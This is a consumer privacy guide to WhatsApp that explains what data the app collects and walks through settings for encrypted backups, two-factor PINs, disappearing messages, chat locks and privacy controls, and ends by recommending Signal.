The data WhatsApp has about you can come from multiple different sources: the information you provide (such as your phone number to sign up, or your location when you give it permission to share it with a friend), information that is collected automatically (for instance, when you’re online, or when you made a phone call), and information that others share about you (if a friend uploads your phone number, for example).

Automatically collected, WhatsApp says, is information about how you use its services, how often and for how long you are on WhatsApp, and the features you use—including “group name, group picture, group description,” your profile photo, “about information,” and when you were last online. (Some of this information is used for safety features.) On top of that, WhatsApp may also collect information about your phone’s battery level, signal strength, and mobile operator.

In the US, WhatsApp shares your phone number, phone information, IP address, and more with Meta’s other companies, although it says it does not “keep logs of who everyone’s messaging or calling” and doesn’t share contacts with Meta. In Europe, WhatsApp details how it works with Meta’s other companies and the information that is shared more explicitly. However, it’s worth stressing that the content of the messages you send isn’t shared, as Meta doesn’t have access to them due to WhatsApp’s end-to-end encryption.

Location information, when you turn it on, is also collected, and there are cookies that track your activity within the desktop and web versions of the app.

Use Encrypted-to-End Encrypted Backups

WhatsApp allows you to back up your chats and data as a way to move all your information to a new phone. These backups work by storing your data in Google Drive or Apple’s iCloud, depending on which operating system you use. Backups can be handy if you’re moving to a new phone or lose your old device.

If you’re going to use WhatsApp’s backups, you should use the version that is end-to-end encrypted. The company introduced these in 2021 after years of the option being unavailable. In WhatsApp, go to **Settings, Chats, Chat Backup**, and then once you have turned backups on, tap on **End-to-end Encrypted Backup** and toggle the option on. This backup requires a separate password, which you should ideally create and store in a password manager. If you lose this password, you won’t be able to get into your encrypted backup.

Turn On Two-Factor Authentication

You should be using two-factor authentication as much as possible—it’s even more important on accounts that hold your sensitive personal information, such as photos and messages. The security method involves adding an extra step to the process when you log in to an account. In most cases, this involves using a security code generated by an app, a code sent via SMS, or a physical security key. (The last of these is the most secure way to protect your accounts with two-factor authentication—and SMS is arguably the least secure of the three options.)

Using WhatsApp is different from logging in to your email. It’s likely that you’ll access the app multiple times a day—on average, I open the app between 50 and 80 times per day. Entering a security code every time this happens would be impractical and frustrating. So instead, WhatsApp’s two-factor authentication, which can be turned on through the **Settings** menu and then by tapping on **Account**, uses a PIN.

WhatsApp will semi-regularly ask you to reenter the six-digit PIN you create to access the app. It doesn’t say how often these prompts happen, but they’re irregular enough not to be a barrier to using the app. The PIN will also be required anytime there is an attempt to add your number to a new phone or device. When you’re setting the PIN, there’s also the option to add an email address that can be used to reset the code if you forget it.

Use Disappearing Messages

Your messages don’t have to live forever. It’s possible to turn on disappearing messages for when you want additional privacy or just don’t need to keep what you’re sent for years. There are two ways within WhatsApp to use self-destructing messages: for every new chat you have, or on an individual conversation basis. 

To run on disappearing messages by default for new conversations, go to **Settings**, **Privacy**, **Default Message Timer**, and pick how long you want messages to last for. There are three options if you turn the setting on: 24 hours, 7 days, or 90 days. For an existing individual conversation or group chat, **open that chat**, **tap the person’s name** at the top of the screen, select **Disappearing Messages,** and then pick 24 hours, 7 days, 90 days, or Off. You may then have to tap to confirm this.

While turning on disappearing messages will give you some more privacy, it’s worth remembering that whoever you message could still screenshot or take a photograph of what’s on the screen.

In addition to disappearing messages, you can also set photos and views to View Once. This—rather unsurprisingly—behaves exactly how it is described: The message can only opened one time and you can't go back to it once it's closed. When sending a photo or video, tap the icon that is contained within a partial circle. If you send a one-time image or video, people cannot screenshot it.

Lock Down WhatsApp Messages

There are inevitably times when you need to hand your phone to someone else—so your children can play games, for instance, or to show a friend a photo. WhatsApp has two features that can help protect your message if your phone falls into someone else’s hands. First, you can turn on Screen Lock, which keeps the app locked unless you open it with Apple’s Face ID or other biometrics on Android devices. To turn it on, go to **Settings**, **Privacy**, and select **Screen Lock**. You’ll need to set up the biometric options before you turn the app lock on.

You can also lock down individual chats on your phone. This means that to send messages to locked chats, you’ll need to use your phone’s passcode, or your face or fingerprint to open up the chats and even see notifications from them. To turn it on, tap **on a chat** and the person’s name, go to **Chat lock**, and select the option to **lock the chat**. This will move the chat into a new folder that can be accessed by **swiping down on the Chats tab**.

If you’re going for the most private approach, it’s also worth considering that any message that pops up could reveal private information. New message notifications can include the entire message or just some of its content when they flash up on your screen. If these notifications also sit unread, anyone picking up your device may be able to read them without having to unlock the phone. These options can be tweaked in **Settings**, **Notifications**, and **Show Preview.**

Stop People From Seeing Your Personal Info

While WhatsApp’s end-to-end encryption stops law enforcement, internet providers, and even Meta from seeing what you are sending, there are still some additional steps you can take to increase your privacy on your phone and reduce the chances of your number being targeted by spammers or scammers. Because WhatsApp is so popular, it’s regularly the target of social engineering attacks, devised to steal your personal information. 

The ways to limit the ways people can interact with your account are all found through **Settings**, followed by tapping on **Privacy**. At the most simple, you can tap to turn off read receipts, the two blue ticks that show when someone has seen your message. 

More effective are the steps that stop people from adding you to groups. Under the **Groups** setting, there is the option to limit who can add you to a group. By default, this is set as “everyone.” However, it can be changed to **My Contacts**, or **My Contacts Except…**, allowing some exceptions. Deciding to limit who can add you to groups doesn’t mean that you can’t join groups when people aren’t in your contacts. Instead, people wanting to add you to groups can request to do so via a separate message.

Within **Privacy,** you can also turn off who can see when you last looked at WhatsApp and when you were last online, who can see your profile photo, the About section, and WhatsApp Status. While in the privacy settings, you should also check whether you are sharing your live location with anyone.

Switch to Signal

If you’re looking for more privacy, switching messaging apps is a big upheaval but could be worth the time and effort. As mentioned earlier, our preference for combining end-to-end encryption with greater levels of privacy is Signal. A full rundown of its privacy options is here.

Tag

#android